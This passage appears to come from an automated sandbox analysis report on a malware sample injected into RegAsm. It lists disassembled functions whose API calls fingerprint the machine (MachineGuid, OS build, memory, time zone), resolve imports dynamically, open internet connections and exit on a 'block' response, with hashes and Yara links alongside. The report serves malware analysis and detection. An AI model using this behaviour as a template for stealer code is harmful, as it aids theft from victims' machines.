                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CrackInternetlstrlen
                                                                                                                                                                                                                                                    • String ID: <
                                                                                                                                                                                                                                                    • API String ID: 1274457161-4251816714
                                                                                                                                                                                                                                                    • Opcode ID: c5c75662170cb2e8ceb1117f814b03d378d4521012c899b72f475a1c8c023b1f
                                                                                                                                                                                                                                                    • Instruction ID: 9e48b281a3d4cfec7802d1f2a91d00f288c095b82b27ddb23999fe50bc1432cf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c5c75662170cb2e8ceb1117f814b03d378d4521012c899b72f475a1c8c023b1f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4215E71904209ABDB10DFA4D845BDDBB79FF05724F10023EFA15AB2C1DB385A468B94
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00410AE0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42registryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00410B05
                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,00000000), ref: 00410B22
                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(00000000,MachineGuid,00000000,00000000,00000000,000000FF), ref: 00410B44
                                                                                                                                                                                                                                                    • CharToOemA.USER32(00000000,?), ref: 00410B62
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CharOpenQueryValuememset
                                                                                                                                                                                                                                                    • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                                                                    • API String ID: 1728412123-1211650757
                                                                                                                                                                                                                                                    • Opcode ID: 097e6b5a824ab531e27af9695ee86ee34bbea885ff9981275bfa0413b924a58e
                                                                                                                                                                                                                                                    • Instruction ID: 879c0b8e10f52e6ed259503056a26aa98f27e53d6fafb90ce68421c616d83f9b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 097e6b5a824ab531e27af9695ee86ee34bbea885ff9981275bfa0413b924a58e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F301F779A4431DFBDB20DB90DC4AFDAB77C9B14704F1001D9B648A21C1EBB46BC48B64
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00410530 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,004272C0,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,004272AC), ref: 0041053E
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,004272C0,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,004272AC,00000000), ref: 00410545
                                                                                                                                                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 00410565
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 0041058B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                                                                    • String ID: %d MB$@
                                                                                                                                                                                                                                                    • API String ID: 3644086013-3474575989
                                                                                                                                                                                                                                                    • Opcode ID: 738daf5a307f83ddde426ce036faced930f102602c3dcf932ed6168948fa4945
                                                                                                                                                                                                                                                    • Instruction ID: ccaa2b2334dd3301b9f1694f37eece0538fd2250e3a8930f87bfe493a029b71b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 738daf5a307f83ddde426ce036faced930f102602c3dcf932ed6168948fa4945
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2F09671A50228ABE704DBE4DC0AFBE776EEB05700F400119FB06E32D0DBB89C4187A9
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00406D60 Relevance: 9.1, APIs: 6, Instructions: 80filememoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000), ref: 00406D97
                                                                                                                                                                                                                                                    • GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DAD
                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DC8
                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DE1
                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406E01
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406E09
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2311089104-0
                                                                                                                                                                                                                                                    • Opcode ID: 5d6a5b90a9eee9abc2f959ea74a4d764c3b013cc9b6044d5e27185051cc21f1c
                                                                                                                                                                                                                                                    • Instruction ID: ddce288ef91ee69b99d2a51aa9964d65ee04ec79e2e3031f151b74944cc7f0b3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d6a5b90a9eee9abc2f959ea74a4d764c3b013cc9b6044d5e27185051cc21f1c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75216D75A00216AFEB10DFA4DC84FAB7769EB05714F10023AF912A76D0D7349D51CBE5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00410D90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47memoryregistryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410DA5
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00410DAC
                                                                                                                                                                                                                                                      • Part of subcall function 00410050: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00410065
                                                                                                                                                                                                                                                      • Part of subcall function 00410050: HeapAlloc.KERNEL32(00000000), ref: 0041006C
                                                                                                                                                                                                                                                      • Part of subcall function 00410050: RegOpenKeyExA.KERNEL32(80000002,015CB448,00000000,00020119,?), ref: 0041008B
                                                                                                                                                                                                                                                      • Part of subcall function 00410050: RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 004100A5
                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,015CB448,00000000,00020119,00000000), ref: 00410DE1
                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(00000000,015D2048,00000000,00000000,00000000,000000FF), ref: 00410DFC
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                                                                    • String ID: Windows 11
                                                                                                                                                                                                                                                    • API String ID: 3676486918-2517555085
                                                                                                                                                                                                                                                    • Opcode ID: 2569570946bb202847a57fd16c0953e2cd1ca13bf3ab2bae79daa6a8b006453a
                                                                                                                                                                                                                                                    • Instruction ID: eea5cb9f473cbd8849c3050f987e838f7784a14057610812035ee29dda7ad254
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2569570946bb202847a57fd16c0953e2cd1ca13bf3ab2bae79daa6a8b006453a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8101F278601219FBEB10DBE4ED09FAA777DEB05705F004169FE04D3240D6B4994087A0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00416DA0 Relevance: 7.6, APIs: 5, Instructions: 145registrystringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00416DE1
                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,015D19C8,00000000,00020119,004226A8), ref: 00416E00
                                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(004226A8,015D2228,00000000,00000000,?,000000FF), ref: 00416E24
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 00416E53
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,015D2300), ref: 00416E67
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$OpenQueryValuememset
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 558315959-0
                                                                                                                                                                                                                                                    • Opcode ID: aeb2f5e142b7bd2e7bab2882ea4500bb36c53994341e954c56e05ae4dfb6b579
                                                                                                                                                                                                                                                    • Instruction ID: f4d773ed905fb2ab0fcc1433a95b0eb9be0e055abdd43aa3a341e0b3f7bbd57f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aeb2f5e142b7bd2e7bab2882ea4500bb36c53994341e954c56e05ae4dfb6b579
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3151E2B494021CABCB14EFA0CC47FEE773AAB48704F00866DF61567281DB746689CBE5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00417870 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 596networksleepCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD60: lstrlenA.KERNEL32(004181A9,?,00000000,?,0041790D,004271B2,004271AF,00000000,?,00000000,004228A8,000000FF,?,004181A9), ref: 0040FD6B
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD60: lstrcpy.KERNEL32(00000000,004181A9), ref: 0040FDA2
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015C2CC0), ref: 00418525
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015C2CE0), ref: 0041853D
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015CD960), ref: 00418556
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015CD9F0), ref: 0041856E
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015CDA50), ref: 00418586
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015CD8D0), ref: 0041859F
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015C3EE0), ref: 004185B7
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015CD948), ref: 004185CF
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015CD9A8), ref: 004185E8
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015CD9D8), ref: 00418600
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015CDAB0), ref: 00418618
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015C2B20), ref: 00418631
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015C2640), ref: 00418649
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015C2680), ref: 00418661
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015C2940), ref: 0041867A
                                                                                                                                                                                                                                                      • Part of subcall function 00418510: GetProcAddress.KERNEL32(74DD0000,015CDA80), ref: 00418692
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00417B06
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00417B1D
                                                                                                                                                                                                                                                      • Part of subcall function 00410BE0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410C18
                                                                                                                                                                                                                                                      • Part of subcall function 00410BE0: GetVolumeInformationA.KERNEL32(00421639,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410C51
                                                                                                                                                                                                                                                      • Part of subcall function 00410BE0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410C9D
                                                                                                                                                                                                                                                      • Part of subcall function 00410BE0: HeapAlloc.KERNEL32(00000000), ref: 00410CA4
                                                                                                                                                                                                                                                      • Part of subcall function 00404420: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044EA
                                                                                                                                                                                                                                                      • Part of subcall function 00404420: StrCmpCA.SHLWAPI(?,015CF600,?,?,?,?,?,?,00000000), ref: 0040450A
                                                                                                                                                                                                                                                      • Part of subcall function 00412650: StrCmpCA.SHLWAPI(00000000,block,00000000,?,00417B94), ref: 00412688
                                                                                                                                                                                                                                                      • Part of subcall function 00412650: ExitProcess.KERNEL32 ref: 00412693
                                                                                                                                                                                                                                                      • Part of subcall function 00405BC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405C8A
                                                                                                                                                                                                                                                      • Part of subcall function 00405BC0: StrCmpCA.SHLWAPI(?,015CF600,?,?,?,?,?,?,00000000), ref: 00405CAA
                                                                                                                                                                                                                                                      • Part of subcall function 004120D0: strtok_s.MSVCRT ref: 00412110
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00417EF5
                                                                                                                                                                                                                                                      • Part of subcall function 00405BC0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405E34
                                                                                                                                                                                                                                                      • Part of subcall function 00413450: strtok_s.MSVCRT ref: 0041348E
                                                                                                                                                                                                                                                      • Part of subcall function 00413450: strtok_s.MSVCRT ref: 0041354B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressProc$lstrcpy$Internet$Open$strtok_s$HeapProcesslstrcatlstrlen$AllocConnectDirectoryExitInformationSleepVolumeWindows
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 518992629-3916222277
                                                                                                                                                                                                                                                    • Opcode ID: a3f2420105ce23338806440f8bdff18df4cdcbfbde6b966e124d67e3711f0eba
                                                                                                                                                                                                                                                    • Instruction ID: d97b83fa0018aa0c97f8ab297af93da8fe9ff5cfbed01d5c517d8eca77a5d222
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a3f2420105ce23338806440f8bdff18df4cdcbfbde6b966e124d67e3711f0eba
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2732A670D14358EADB10EBB5C947BDDBBB4AF04704F1441AEE40973282DB781B48CBAA
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6EC930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6C6EC947
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C6EC969
                                                                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?), ref: 6C6EC9A9
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C6EC9C8
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C6EC9E2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4191843772-0
                                                                                                                                                                                                                                                    • Opcode ID: efdc8ac4c9116c58d899ebe4d7ce15631de410d3bb65a579469957571bf6e645
                                                                                                                                                                                                                                                    • Instruction ID: 7cefc1e5911ba844cff9735c1030e51971bde6144d6a81a7d10d4584807537ca
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: efdc8ac4c9116c58d899ebe4d7ce15631de410d3bb65a579469957571bf6e645
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E210A717062047BDB04AB24DC88BAE77B9AB4A304F90012AF903A7780EF20680487A5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00410E20 Relevance: 7.6, APIs: 5, Instructions: 70commemoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00427870,00000000,00000001,00427090,?,00000001,00000001,?,00000000,?,Windows: ,00000000,?,00427220,00000000,?), ref: 00410E3D
                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00410E4C
                                                                                                                                                                                                                                                    • _wtoi64.MSVCRT ref: 00410E92
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00410EA8
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00410EAB
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
